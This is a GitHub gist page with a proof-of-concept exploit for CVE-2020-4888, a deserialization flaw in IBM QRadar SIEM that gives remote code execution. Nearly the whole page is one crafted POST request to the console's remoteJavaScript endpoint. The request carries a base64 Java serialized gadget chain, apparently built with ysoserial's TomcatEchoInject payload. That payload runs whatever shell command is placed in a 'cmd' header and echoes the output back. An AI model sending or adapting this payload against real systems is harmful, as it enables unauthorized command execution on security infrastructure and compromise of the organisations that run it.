-
-
Save testanull/e9ba06d0c0c403402f6941fe2dbb868a to your computer and use it in GitHub Desktop.
poc of CVE-2020-4888 IBM Qradar siem deserialization to rce
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
POST /console/remoteJavaScript HTTP/1.1 | |
Host: <Host> | |
User-Agent: python-requests/2.24.0 | |
Connection: close | |
SEC: af4420ac-7116-4be9-b7b9-94c4595c7a42 | |
Cookie: JSESSIONID=A7526C2DD5CE837DF89E0B3D0D242880; | |
Content-Length: 8745 | |
cmd: <Command Here> | |
{"method": "qradar.getColumnDefinitionString", "QRadarCSRF": "a849abdb-f64f-495f-9407-2eafe3b074d0", "id": "63274893", "params": {"variables": "rO0ABXNyABFqYXZhLnV0aWwuSGFzaE1hcAUH2sHDFmDRAwACRgAKbG9hZEZhY3RvckkACXRocmVzaG9sZHhwP0AAAAAAAAB3CAAAAAIAAAACc3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLk9iamVjdEJlYW6CmQfedgSUSgIAA0wADl9jbG9uZWFibGVCZWFudAAtTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL0Nsb25lYWJsZUJlYW47TAALX2VxdWFsc0JlYW50ACpMY29tL3N1bi9zeW5kaWNhdGlvbi9mZWVkL2ltcGwvRXF1YWxzQmVhbjtMAA1fdG9TdHJpbmdCZWFudAAsTGNvbS9zdW4vc3luZGljYXRpb24vZmVlZC9pbXBsL1RvU3RyaW5nQmVhbjt4cHNyACtjb20uc3VuLnN5bmRpY2F0aW9uLmZlZWQuaW1wbC5DbG9uZWFibGVCZWFu3WG7xTNPa3cCAAJMABFfaWdub3JlUHJvcGVydGllc3QAD0xqYXZhL3V0aWwvU2V0O0wABF9vYmp0ABJMamF2YS9sYW5nL09iamVjdDt4cHNyAB5qYXZhLnV0aWwuQ29sbGVjdGlvbnMkRW1wdHlTZXQV9XIdtAPLKAIAAHhwc3EAfgACc3EAfgAHcQB%2bAAxzcgA6Y29tLnN1bi5vcmcuYXBhY2hlLnhhbGFuLmludGVybmFsLnhzbHRjLnRyYXguVGVtcGxhdGVzSW1wbAlXT8FurKszAwAGSQANX2luZGVudE51bWJlckkADl90cmFuc2xldEluZGV4WwAKX2J5dGVjb2Rlc3QAA1tbQlsABl9jbGFzc3QAEltMamF2YS9sYW5nL0NsYXNzO0wABV9uYW1ldAASTGphdmEvbGFuZy9TdHJpbmc7TAARX291dHB1dFByb3BlcnRpZXN0ABZMamF2YS91dGlsL1Byb3BlcnRpZXM7eHAAAAAA/////3VyAANbW0JL/RkVZ2fbNwIAAHhwAAAAAnVyAAJbQqzzF/gGCFTgAgAAeHAAABLiyv66vgAAADQA7woAOgB/CACACgCBAIIIAGsKAIEAgwcAhAgAaggAaAcAhQgAhgoACQCHCgAJAIgHAIkKAAkAigoACQCLBwCMCgAJAI0KABAAjgcAjwgAbAsAEwCQCgAQAH8KAAkAkQoACQCSBwCTCwAZAJQHAJUIAFYHAJYIAFgJAJcAmAgAmQoAmgCbCgAlAJwIAJ0KACUAngcAnwgAoAgAoQgAoggAowoApAClCgCkAKYKAKcAqAcAqQoALQCqCACrCgAtAKwKAC0ArQoALQCuCACvCgCwALEKALAAsgoAsACzBwC0CgA3ALUHALYHALcBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvVG9tY2F0RWNob0luamVjdDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVudAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRsZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcAuAEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAIPGNsaW5pdD4BAA5yZXNwb25zZUZhY2FkZQEAH0xqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXNwb25zZTsBAAF3AQAQTGphdmEvaW8vV3JpdGVyOwEADXJlc3BvbnNlRmllbGQBABlMamF2YS9sYW5nL3JlZmxlY3QvRmllbGQ7AQAIcmVzcG9uc2UBAChMb3JnL2FwYWNoZS9jYXRhbGluYS9jb25uZWN0b3IvUmVzcG9uc2U7AQALdXNpbmdXcml0ZXIBAAdpc0xpbnV4AQABWgEABW9zVHlwAQASTGphdmEvbGFuZy9TdHJpbmc7AQAEY21kcwEAE1tMamF2YS9sYW5nL1N0cmluZzsBAAJpbgEAFUxqYXZhL2lvL0lucHV0U3RyZWFtOwEAAXMBABNMamF2YS91dGlsL1NjYW5uZXI7AQAGb3V0cHV0AQAWV1JBUF9TQU1FX09CSkVDVF9GSUVMRAEAGGxhc3RTZXJ2aWNlZFJlcXVlc3RGaWVsZAEAGWxhc3RTZXJ2aWNlZFJlc3BvbnNlRmllbGQBAA5tb2RpZmllcnNGaWVsZAEAFGxhc3RTZXJ2aWNlZFJlc3BvbnNlAQAXTGphdmEvbGFuZy9UaHJlYWRMb2NhbDsBABNsYXN0U2VydmljZWRSZXF1ZXN0AQAQV1JBUF9TQU1FX09CSkVDVAEAA2NtZAEAAWUBABVMamF2YS9sYW5nL0V4Y2VwdGlvbjsBABZMb2NhbFZhcmlhYmxlVHlwZVRhYmxlAQA4TGphdmEvbGFuZy9UaHJlYWRMb2NhbDxMamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2U7PjsBADdMamF2YS9sYW5nL1RocmVhZExvY2FsPExqYXZheC9zZXJ2bGV0L1NlcnZsZXRSZXF1ZXN0Oz47AQANU3RhY2tNYXBUYWJsZQcAhQcAjAcAnwcAkwcAuQcAlgcAXgcAugcAqQcAtAEAClNvdXJjZUZpbGUBABVUb21jYXRFY2hvSW5qZWN0LmphdmEMADsAPAEALm9yZy5hcGFjaGUuY2F0YWxpbmEuY29yZS5BcHBsaWNhdGlvbkRpc3BhdGNoZXIHALsMALwAvQwAvgC/AQAvb3JnL2FwYWNoZS9jYXRhbGluYS9jb3JlL0FwcGxpY2F0aW9uRmlsdGVyQ2hhaW4BABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAEACW1vZGlmaWVycwwAwADBDADCAMMBABpqYXZhL2xhbmcvcmVmbGVjdC9Nb2RpZmllcgwAxADFDADGAMcBABVqYXZhL2xhbmcvVGhyZWFkTG9jYWwMAMgAyQwAxgDKAQAlamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVxdWVzdAwAywDMDADNAM4MAM8A0AEAHWphdmF4L3NlcnZsZXQvU2VydmxldFJlc3BvbnNlDADRANIBACxvcmcvYXBhY2hlL2NhdGFsaW5hL2Nvbm5lY3Rvci9SZXNwb25zZUZhY2FkZQEAJm9yZy9hcGFjaGUvY2F0YWxpbmEvY29ubmVjdG9yL1Jlc3BvbnNlBwDTDADUANUBAAdvcy5uYW1lBwDWDADXAMwMANgA2QEAA3dpbgwA2gDbAQAQamF2YS9sYW5nL1N0cmluZwEAAnNoAQACLWMBAAdjbWQuZXhlAQACL2MHANwMAN0A3gwA3wDgBwDhDADiAOMBABFqYXZhL3V0aWwvU2Nhbm5lcgwAOwDkAQACXGEMAOUA5gwA5wDoDADpANkBAAAHALkMAOoA6wwA7AA8DADtADwBABNqYXZhL2xhbmcvRXhjZXB0aW9uDADuADwBACN5c29zZXJpYWwvcGF5bG9hZHMvVG9tY2F0RWNob0luamVjdAEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQBADljb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAA5qYXZhL2lvL1dyaXRlcgEAE2phdmEvaW8vSW5wdXRTdHJlYW0BAA9qYXZhL2xhbmcvQ2xhc3MBAAdmb3JOYW1lAQAlKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL0NsYXNzOwEAEGdldERlY2xhcmVkRmllbGQBAC0oTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZDsBAA1zZXRBY2Nlc3NpYmxlAQAEKFopVgEADGdldE1vZGlmaWVycwEAAygpSQEABnNldEludAEAFihMamF2YS9sYW5nL09iamVjdDtJKVYBAANnZXQBACYoTGphdmEvbGFuZy9PYmplY3Q7KUxqYXZhL2xhbmcvT2JqZWN0OwEACmdldEJvb2xlYW4BABUoTGphdmEvbGFuZy9PYmplY3Q7KVoBABQoKUxqYXZhL2xhbmcvT2JqZWN0OwEACWdldEhlYWRlcgEAJihMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmc7AQADc2V0AQAnKExqYXZhL2xhbmcvT2JqZWN0O0xqYXZhL2xhbmcvT2JqZWN0OylWAQAKc2V0Qm9vbGVhbgEAFihMamF2YS9sYW5nL09iamVjdDtaKVYBAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwEAEWphdmEvbGFuZy9Cb29sZWFuAQAFRkFMU0UBABNMamF2YS9sYW5nL0Jvb2xlYW47AQAQamF2YS9sYW5nL1N5c3RlbQEAC2dldFByb3BlcnR5AQALdG9Mb3dlckNhc2UBABQoKUxqYXZhL2xhbmcvU3RyaW5nOwEACGNvbnRhaW5zAQAbKExqYXZhL2xhbmcvQ2hhclNlcXVlbmNlOylaAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7AQAEZXhlYwEAKChbTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsBABFqYXZhL2xhbmcvUHJvY2VzcwEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsBAAdoYXNOZXh0AQADKClaAQAEbmV4dAEABXdyaXRlAQAVKExqYXZhL2xhbmcvU3RyaW5nOylWAQAFZmx1c2gBAAVjbG9zZQEAD3ByaW50U3RhY2tUcmFjZQAhADkAOgAAAAAABAABADsAPAABAD0AAAAvAAEAAQAAAAUqtwABsQAAAAIAPgAAAAYAAQAAABcAPwAAAAwAAQAAAAUAQABBAAAAAQBCAEMAAgA9AAAAPwAAAAMAAAABsQAAAAIAPgAAAAYAAQAAAFEAPwAAACAAAwAAAAEAQABBAAAAAAABAEQARQABAAAAAQBGAEcAAgBIAAAABAABAEkAAQBCAEoAAgA9AAAASQAAAAQAAAABsQAAAAIAPgAAAAYAAQAAAFcAPwAAACoABAAAAAEAQABBAAAAAAABAEQARQABAAAAAQBLAEwAAgAAAAEATQBOAAMASAAAAAQAAQBJAAgATwA8AAEAPQAAA%2bsABAATAAABsRICuAADEgS2AAVLEgYSB7YABUwSBhIItgAFTRIJEgq2AAVOLQS2AAstKiq2AAwQ7362AA4tKyu2AAwQ7362AA4tLCy2AAwQ7362AA4qBLYACysEtgALLAS2AAssAbYAD8AAEDoEKwG2AA/AABA6BSoBtgARNgYZBcYAGBkFtgASwAATwAATEhS5ABUCAKcABAE6BxUGmQANGQTGAAgZBccAJCsBuwAQWbcAFrYAFywBuwAQWbcAFrYAFyoBBLYAGKcA6BkHxgDjGQS2ABLAABk6CBkIuQAaAQBXGQi5ABoBADoJEhsSHLYABToKGQoEtgALGQoZCLYAD8AAHToLEh0SHrYABToMGQwEtgALGQwZC7IAH7YAFwQ2DRIguAAhOg4ZDsYAExkOtgAiEiO2ACSZAAYDNg0VDZkAGQa9ACVZAxImU1kEEidTWQUZB1OnABYGvQAlWQMSKFNZBBIpU1kFGQdTOg%2b4ACoZD7YAK7YALDoQuwAtWRkQtwAuEi%2b2ADA6ERkRtgAxmQALGRG2ADKnAAUSMzoSGQkZErYANBkJtgA1GQm2ADanAAhLKrYAOLEAAQAAAagBqwA3AAQAPgAAALYALQAAABsACwAcABMAHQAbAB4AIwAfACgAIAA0ACEAQAAiAEwAIwBRACQAVgAlAFsAJwBdACgAZQApAG8AKgB2ACsAkwAsAKIALQCuAC4AugAvAMMAMADIADEA0gAyANoAMwDjADQA7AA1APIANgD%2bADcBBwA4AQ0AOQEXADsBGgA8ASEAPQEzAD4BNgBAAWYAQQFzAEIBgwBDAZcARAGeAEUBowBGAagASwGrAEkBrABKAbAATAA/AAAAygAUANIA1gBQAFEACADjAMUAUgBTAAkA7AC8AFQAVQAKAP4AqgBWAFcACwEHAKEAWABVAAwBGgCOAFkAWgANASEAhwBbAFwADgFmAEIAXQBeAA8BcwA1AF8AYAAQAYMAJQBhAGIAEQGXABEAYwBcABIACwGdAGQAVQAAABMBlQBlAFUAAQAbAY0AZgBVAAIAIwGFAGcAVQADAGUBQwBoAGkABABvATkAagBpAAUAdgEyAGsAWgAGAJMBFQBsAFwABwGsAAQAbQBuAAAAbwAAABYAAgBlAUMAaABwAAQAbwE5AGoAcQAFAHIAAAB4AAz/AJAABwcAcwcAcwcAcwcAcwcAdAcAdAEAAEAHAHX8ABAHAHUg/wByAA8HAHMHAHMHAHMHAHMHAHQHAHQBBwB1BwB2BwB3BwBzBwB4BwBzAQcAdQAAGlIHAHn%2bAC4HAHkHAHoHAHtBBwB1/wASAAAAAEIHAHwEAAEAfQAAAAIAfnVxAH4AFwAAAdTK/rq%2bAAAANAAbCgADABUHABcHABgHABkBABBzZXJpYWxWZXJzaW9uVUlEAQABSgEADUNvbnN0YW50VmFsdWUFceZp7jxtRxgBAAY8aW5pdD4BAAMoKVYBAARDb2RlAQAPTGluZU51bWJlclRhYmxlAQASTG9jYWxWYXJpYWJsZVRhYmxlAQAEdGhpcwEAA0ZvbwEADElubmVyQ2xhc3NlcwEAJUx5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbzsBAApTb3VyY2VGaWxlAQAMR2FkZ2V0cy5qYXZhDAAKAAsHABoBACN5c29zZXJpYWwvcGF5bG9hZHMvdXRpbC9HYWRnZXRzJEZvbwEAEGphdmEvbGFuZy9PYmplY3QBABRqYXZhL2lvL1NlcmlhbGl6YWJsZQEAH3lzb3NlcmlhbC9wYXlsb2Fkcy91dGlsL0dhZGdldHMAIQACAAMAAQAEAAEAGgAFAAYAAQAHAAAAAgAIAAEAAQAKAAsAAQAMAAAALwABAAEAAAAFKrcAAbEAAAACAA0AAAAGAAEAAAA7AA4AAAAMAAEAAAAFAA8AEgAAAAIAEwAAAAIAFAARAAAACgABAAIAFgAQAAlwdAAEUHducnB3AQB4c3IAKGNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLkVxdWFsc0JlYW71ihi75fYYEQIAAkwACl9iZWFuQ2xhc3N0ABFMamF2YS9sYW5nL0NsYXNzO0wABF9vYmpxAH4ACXhwdnIAHWphdmF4LnhtbC50cmFuc2Zvcm0uVGVtcGxhdGVzAAAAAAAAAAAAAAB4cHEAfgAUc3IAKmNvbS5zdW4uc3luZGljYXRpb24uZmVlZC5pbXBsLlRvU3RyaW5nQmVhbgn1jkoPI%2b4xAgACTAAKX2JlYW5DbGFzc3EAfgAcTAAEX29ianEAfgAJeHBxAH4AH3EAfgAUc3EAfgAbdnEAfgACcQB%2bAA1zcQB%2bACBxAH4AI3EAfgANcQB%2bAAZxAH4ABnEAfgAGeA%3d%3d"}} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment